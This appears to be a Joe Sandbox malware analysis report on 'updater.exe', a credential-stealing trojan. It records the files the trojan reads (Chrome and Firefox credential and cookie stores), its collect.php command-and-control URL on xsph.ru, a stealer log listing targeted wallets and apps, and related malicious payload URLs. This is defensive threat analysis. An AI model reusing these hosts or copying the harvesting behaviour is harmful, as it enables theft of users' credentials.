          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01406107 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_01406107
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014061B5 GetLongPathNameW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,1_2_014061B5
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01406127 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_01406127
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0141E44C
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014224FE VirtualProtect ?,-00000001,00000104,?,?,?,0000001C1_2_014224FE
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013DA518 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_013DA518
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C4455 GetProcessHeap,1_2_013C4455
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01430095 mov eax, dword ptr fs:[00000030h]1_2_01430095
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01422780 mov eax, dword ptr fs:[00000030h]1_2_01422780
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141E5AE SetUnhandledExceptionFilter,1_2_0141E5AE
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141E44C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0141E44C
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141E9B2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0141E9B2
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142337D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0142337D
          Source: C:\Users\user\Desktop\updater.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_0143A932
          Source: C:\Users\user\Desktop\updater.exeCode function: EnumSystemLocalesW,1_2_0143ABD4
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_0143AD45
          Source: C:\Users\user\Desktop\updater.exeCode function: EnumSystemLocalesW,1_2_0143AC1F
          Source: C:\Users\user\Desktop\updater.exeCode function: EnumSystemLocalesW,1_2_0143ACBA
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoW,1_2_0143AF98
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoW,1_2_0143B1C4
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0143B0BE
          Source: C:\Users\user\Desktop\updater.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_0143B293
          Source: C:\Users\user\Desktop\updater.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,1_2_0141D58A
          Source: C:\Users\user\Desktop\updater.exeCode function: EnumSystemLocalesW,1_2_0142F7EF
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141E678 cpuid 1_2_0141E678
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142FDA7 GetSystemTimeAsFileTime,1_2_0142FDA7
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01433BF4 _free,GetTimeZoneInformation,_free,1_2_01433BF4
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013E2F5C GetVersionExA,1_2_013E2F5C

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: updater.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTR
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: updater.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          Path InterceptionPath Interception1
          Virtualization/Sandbox Evasion
          1
          OS Credential Dumping
          2
          System Time Discovery
          Remote Services1
          Screen Capture
          Exfiltration Over Other Network Medium2
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools
          LSASS Memory2
          Security Software Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth2
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager1
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Man in the Browser
          Automated Exfiltration12
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information
          NTDS2
          Process Discovery
          Distributed Component Object Model1
          Data from Local System
          Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync34
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          updater.exe92%ReversingLabsWin32.Trojan.StellarStealer
          updater.exe85%VirustotalBrowse
          updater.exe100%AviraHEUR/AGEN.1305371
          updater.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          f0837288.xsph.ru
          141.8.192.151
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            http://f0837288.xsph.rufalse
              high
              http://f0837288.xsph.ru/collect.phpfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://ac.ecosia.org/autocomplete?q=updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drfalse
                  high
                  https://duckduckgo.com/chrome_newtabupdater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drfalse
                    high
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drfalse
                      high
                      https://duckduckgo.com/ac/?q=updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drfalse
                        high
                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchupdater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drfalse
                          high
                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drfalse
                            high
                            https://www.google.com/favicon.icoWLDIDRPJXW.PRECQYBSH.1.drfalse
                              high
                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                141.8.192.151
                                f0837288.xsph.ruRussian Federation
                                35278SPRINTHOSTRUfalse
                                Joe Sandbox Version:38.0.0 Beryl
                                Analysis ID:1266489
                                Start date and time:2023-07-04 11:11:03 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 4m 48s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:3
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample file name:updater.exe
                                Detection:MAL
                                Classification:mal92.troj.spyw.winEXE@1/5@1/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 90
                                • Number of non-executed functions: 133
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.238.85.254, 8.247.206.254, 8.247.205.254, 8.248.117.254, 8.248.147.254
                                • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                11:12:04API Interceptor57x Sleep call for process: updater.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                141.8.192.151ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeGet hashmaliciousAzorultBrowse
                                • f0355889.xsph.ru/Panel/index.php
                                gOKMPhOLiN.exeGet hashmaliciousPhoenix Miner, ccminerBrowse
                                • f0758246.xsph.ru//zima.php?mine=ETC
                                DWG Material, Standard BS 4360 GR. 40A43A.jarGet hashmaliciousUnknownBrowse
                                • f0719949.xsph.ru/dropbox.exe
                                DWG Material, Standard BS 4360 GR. 40A43A.jarGet hashmaliciousUnknownBrowse
                                • f0719949.xsph.ru/dropbox.exe
                                dropbox.exeGet hashmaliciousUnknownBrowse
                                • f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
                                DWG spare parts 455RTMGF Model.exeGet hashmaliciousRemcosBrowse
                                • f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh
                                NotaFiscal.msiGet hashmaliciousUnknownBrowse
                                • f0717271.xsph.ru/serv.php
                                Revised sales contract for Crosswear.rtfGet hashmaliciousSnake KeyloggerBrowse
                                • f0705964.xsph.ru/mum.exe
                                cxbqjWw79R.exeGet hashmaliciousXmrigBrowse
                                • f0702521.xsph.ru/cmd.php?hwid=computer%5Cuser&gpuname=88P9A4OS;%20&mining=1&active=XMR
                                IVBPFW.exeGet hashmaliciousUnknownBrowse
                                • f0702055.xsph.ru/ng.txt
                                NOPL-25-JULY-001.docGet hashmaliciousRemcosBrowse
                                • f0699262.xsph.ru/letter.exe
                                300618c6e81ee458a3aba4188f0f24937f62974991428.exeGet hashmaliciousRedLine, Remcos, XmrigBrowse
                                • f0699616.xsph.ru/RATTCRYPT.exe
                                http://f0688845.xsph.ru/index.phpGet hashmaliciousUnknownBrowse
                                • f0688845.xsph.ru/favicon.ico
                                18561381.exeGet hashmaliciousRedLineBrowse
                                • f0645594.xsph.ru/build.exe
                                bd250e1cb4f8d322a5464549dc067ac7bcbecfc2d4fca.exeGet hashmaliciousRedLine Remcos XmrigBrowse
                                • f0641877.xsph.ru/lam1di.exe
                                9WPRwZwY47.exeGet hashmaliciousRedLineBrowse
                                • f0624763.xsph.ru/MicrosoftApi.exe
                                2a09Y5NsoG.exeGet hashmaliciousAmadey RedLine SmokeLoader Tofsee VidarBrowse
                                • f0611101.xsph.ru/1.exe
                                NFe_09112021123.msiGet hashmaliciousHidden Macro 4.0Browse
                                • f0589562.xsph.ru//arqvs//zlibai.dll
                                VapeV4Installer (2).exeGet hashmaliciousUnknownBrowse
                                • f0587499.xsph.ru/dop.exe
                                7ofFMoirr5.exeGet hashmaliciousRaccoon RedLine SmokeLoaderBrowse
                                • f0589056.xsph.ru/bfs.exe
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                SPRINTHOSTRUal7OvZOSKy.exeGet hashmaliciousDCRatBrowse
                                • 141.8.197.42
                                1iakzzaLRr.exeGet hashmaliciousDCRatBrowse
                                • 141.8.197.42
                                HEUR-Backdoor.MSIL.LightStone.gen-8e6d8d43b27.exeGet hashmaliciousDCRatBrowse
                                • 141.8.197.42
                                HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exeGet hashmaliciousBlackNETBrowse
                                • 141.8.197.42
                                http://f0827197.xsph.ru/000/0101/battle/?login=john.gdoe@arcadia.ioGet hashmaliciousUnknownBrowse
                                • 141.8.192.151
                                acctspay ACH_INSTRUCTIONSpdf.shtmlGet hashmaliciousUnknownBrowse
                                • 141.8.192.169
                                file.exeGet hashmaliciousTofseeBrowse
                                • 185.185.68.207
                                rskovbrand.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 141.8.192.93
                                7SzUgdO8Ne.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 141.8.192.93
                                Archd.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 141.8.192.93
                                file.exeGet hashmaliciousTofseeBrowse
                                • 141.8.195.197
                                Y0VyFqYj2i.exeGet hashmaliciousTofseeBrowse
                                • 141.8.195.197
                                5zZPgwyy8n.exeGet hashmaliciousTofseeBrowse
                                • 141.8.195.197
                                vk8Xlb1vw3.exeGet hashmaliciousTofseeBrowse
                                • 141.8.195.197
                                file.exeGet hashmaliciousTofseeBrowse
                                • 141.8.195.197
                                file.exeGet hashmaliciousAmadey, Fabookie, PrivateLoader, RedLine, TofseeBrowse
                                • 185.185.70.73
                                Gardenizes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 141.8.192.93
                                ufuldkommenhederne.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • 141.8.192.93
                                file.exeGet hashmaliciousTofseeBrowse
                                • 185.185.70.73
                                file.exeGet hashmaliciousPSWmarketBrowse
                                • 141.8.194.203
                                No context
                                No context
                                Process:C:\Users\user\Desktop\updater.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):743
                                Entropy (8bit):4.529509263761332
                                Encrypted:false
                                SSDEEP:12:SxPrJi2YSCqTR/Us/5xcIx4ysD8UzmHZEgX56Qi91M:KPV/YueixcIx4ysDL6FX56QiI
                                MD5:FCDECECC8C1DF24F7057FA6402F2F561
                                SHA1:0837132F80947BA8C1C8802A5FF676599A0210CB
                                SHA-256:96840970C25E9DD2CC9D6F9A3E2071FA8391B8B87E40E6C0E1F4EABD0D0790A3
                                SHA-512:3A667EB870C2C3E7438F2ECF84152591CD192CC8327E0794EAAC18E09860AE3D940F92E2964202FCFC02AC8AFEA5F871311B5111B269C7ED3B111DBB7AF4AD3A
                                Malicious:false
                                Reputation:low
                                Preview:System hash: b4c8ac298ecd13471647646125ed843d.Build: 1029702468.Version: 1.11.Build name: @traffer.----------------------------------------------------.[BETA BUILD v1.11] COLLECTOR PROJECT.----------------------------------------------------..System: Windows 7 (x64)..AutoFill: 0.Passwords: 0.Cookies: 9.Cards: 0..Atomic: -.Armory: -.Bytecoin: -.BitcoinCore: -.DashCore: -.Litecoin: -.Electrum: -.Zcash: -.Ethereum: -..Authy (2FA): -.Files: 12.FileZilla: -.NordVPN: -.Telegram: -.Discord: -.PSI: -.Wallet: -.Pidgin: -.Steam: -...----------------------------------------------------.Startup path: C:\Users\user\Desktop\updater.exe.Start time: Tue Jul 4 11:12:05 2023.Get log time: 3 sec..----------------------------------------------------..
                                Process:C:\Users\user\Desktop\updater.exe
                                File Type:SQLite 3.x database, user version 7, last written using SQLite version 3024000, page size 32768, file counter 5, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):524288
                                Entropy (8bit):0.08108430995212909
                                Encrypted:false
                                SSDEEP:48:De8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DeUm7ii+7Ue1AQ98VVY
                                MD5:2B9F6CFC2BFEAD36B3B619A65FD9759C
                                SHA1:78B8225E9B528E5A5EA35EB1649CBDB334A44A3C
                                SHA-256:E6C938035A1B57C0A47FB3B55797B6BFA056CC62360F4893F31D8F39102368D4
                                SHA-512:97A3B2B689C33502FB25DE2CE42AE4F5F0260F7679A8E36D16782D2775A5BB28B7BC03B0814F5E588C133EB95F6E0E2CA0BD2E7BBCB4838FB29BDEF855D5E9F7
                                Malicious:false
                                Reputation:low
                                Preview:SQLite format 3......@ ..........................................................................$......}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\updater.exe
                                File Type:ASCII text, with very long lines (690)
                                Category:dropped
                                Size (bytes):1401
                                Entropy (8bit):5.0777728481751625
                                Encrypted:false
                                SSDEEP:24:JLWmPFn+wnlqc8jlwVs3sI2GPfQQttE6sC63tpsC63tGEpDVD:9dlqc8joE2QB1B6nB6UMD
                                MD5:C4EF4F766ADD2492805FA188B0D4589D
                                SHA1:E01A63D81464C41507E6C08092AEB512D040B3F4
                                SHA-256:545570454417671F0DC0A5F67BEB7495FB4329EFCFFEFEDF4AC092D3C13DE327
                                SHA-512:6EABC640538BEA2DC27DAAA0A06E75A36B99DC2FD5695D41C5C9F612D48181FB65539B6A1EC2124239824E95C6171809F962F6B2AB8419FA9643A5A594B807D9
                                Malicious:false
                                Reputation:low
                                Preview:www.mozilla.org.FALSE./.0.1510052761.moz-notification-fx-out-of-date.fx-out-of-date-banner..mozilla.org.FALSE./.0.1823598364.optimizelyEndUserId.oeu1508238364462r0.17947700943881573..mozilla.org.FALSE./.0.1823598364.optimizelySegments.%7B%22245617832%22%3A%22none%22%2C%22245677587%22%3A%22ff%22%2C%22245875585%22%3A%22direct%22%2C%22246048108%22%3A%22false%22%7D..246059135.log.optimizely.com.FALSE./.0.1823598366.end_user_id.oeu1508238364462r0.17947700943881573..mozilla.org.FALSE./.0.1823598366.optimizelyBuckets.%7B%7D..mozilla.org.FALSE./.0.1508238381.optimizelyPendingLogEvents.%5B%22n%3Doptly_activate%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.494%26f%3D8540095929%2C8784714594%26g%3D%22%2C%22n%3Dhttps%253A%252F%252Fwww.mozilla.org%252Fen-US%252Ffirefox%252F52.0.1%252Ffirstrun%252F%253Ff%253D102%26u%3Doeu1508238364462r0.17947700943881573%26wxhr%3Dtrue%26time%3D1508238364.446%26f%3D8540095929%2C8784714594%26g%3D859230343%22%2C%22n%3Dhttps%253A%252F%252Fw
                                Process:C:\Users\user\Desktop\updater.exe
                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):1676004
                                Entropy (8bit):7.874441819105141
                                Encrypted:false
                                SSDEEP:49152:806ycPllPGbrowJhiduB2GovOAZYzS1jc/MLa:HnejarhJhiYB2OAZYojiMu
                                MD5:F456BD4CCB4FACEDAA45EE16554DE4E6
                                SHA1:17C0E109FC80650CFF1158DD6095055F2F9B6061
                                SHA-256:6A061B16AAE2F44C722099512366A0739799F61627FE697A685B8ABF001063C6
                                SHA-512:F080FCE6FC284B0C3F1E5E46E437FE08C858A81348AC467A50822DA88351A1D75DCCB21D6414282A29F9210440366C569A8FB3C5117A3ED676EBFA985101F0E8
                                Malicious:false
                                Reputation:low
                                Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...UE....!.0...f.....d.l\sZs...Y.(........s...I..0.b..UuW..>}.3...?..}......w.y..sj.......}e(.m..?a(.a..&.O.9.6.>J.?......-.<.JN....S.h8...]...[.1.=.z.0.P...'h.l.b........P..c0q.5..K...Y'FYS.;...X3..;...~[P..@....I..Y...e..:..X.....c...eL^.:5....jt4..D..pN...!.2cZ.....JO.V]...j......Ak.8...R......k.:q$B.dZ.3.w...$.c.Ey..P..m...\..Z..dN....^;....Rq&r/TS..b.:V.............q[.."..g......>..E.z.].-.E9...K......q_.....\.y.. ..m...*...3....{..x...GR...Wt0.....k...a.".......].ak0..<.9.s].....yf........(.....w?r.p..N..1T..K..m.....l..... .....u...=p.T....'..{kR]G..~.R.c...C9........eN..f....}Bi.a..KqM.W.v..."}jy.......E..\q[..7F;.....q...s.R...1.RZ7..Dk\......[+0..T_Lk.1.8...c..,.?.kZ?..`[.`..Y....%.p...-..>.lk....jd...0.".r..@l..)Z..C...`.~..4E....~....$_...?S.,.7.8!y..q.~8...M..(.~.G.M...3(j.p...a.]..*F..P.[.......mLP.@..X..F.6....jk.. .<...
                                Process:C:\Users\user\Desktop\updater.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 4, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):77824
                                Entropy (8bit):1.1340767975888557
                                Encrypted:false
                                SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.7660386658610205
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:updater.exe
                                File size:698'280 bytes
                                MD5:5b7111ae32c04c641c56e81a6293ec48
                                SHA1:77331d9725c41635d6d449414c8a0d4ee00fac63
                                SHA256:4cedab343fc4581149b13b7f6fd6532fa2c437550dee42926b37a93c6b5997f9
                                SHA512:d7d9c38e7e909e057c64c091e33cc118df3b7503e11345919613462ed006d91f8b5c8e302b599fb740cb55eb3a4c030fbf5ed5febdb4c2e83752325f26124e78
                                SSDEEP:12288:VoJqNIPtNmO6IOOEp0TMlja7NRl2PSVikIyoyueh+AkHcnLwuukoCOD6zlijOz+2:VoJEKZ6IEGTMxapRl2PSwHTehy6B1+p4
                                TLSH:93E4C033F0C2C07ED0321032596CEB6259BFF9320A25499BA3C4156E9FB57D29E3665B
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`..P$...$...$.......4...............0.......8.......%.......u.......3.......)...$...........&.......%...Rich$..................
                                Icon Hash:aaf3e3e3918382a0
                                Entrypoint:0x45e27e
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Time Stamp:0x5FCCE7D9 [Sun Dec 6 14:16:57 2020 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:6
                                OS Version Minor:0
                                File Version Major:6
                                File Version Minor:0
                                Subsystem Version Major:6
                                Subsystem Version Minor:0
                                Import Hash:2a908babc5cc3af850e078751d7de0e9
                                Signature Valid:false
                                Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                Signature Validation Error:The digital signature of the object did not verify
                                Error Number:-2146869232
                                Not Before, Not After
                                • 3/4/2020 10:39:47 AM 3/3/2021 10:39:47 AM
                                Subject Chain
                                • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                Version:3
                                Thumbprint MD5:AAEE394B1087AC1044A13D09468CDF1E
                                Thumbprint SHA-1:2485A7AFA98E178CB8F30C9838346B514AEA4769
                                Thumbprint SHA-256:C0772D3C9E20C3F4EBB09F5816D6DADA0D8FA86563C2D68898539EC1CD355A1B
                                Serial:3300000187721772155940C709000000000187
                                Instruction
                                call 00007FF238A8F2B3h
                                jmp 00007FF238A8EB09h
                                cmp ecx, dword ptr [004A2014h]
                                jne 00007FF238A8EC95h
                                ret
                                jmp 00007FF238A8F3D7h
                                mov ecx, dword ptr [ebp-0Ch]
                                mov dword ptr fs:[00000000h], ecx
                                pop ecx
                                pop edi
                                pop edi
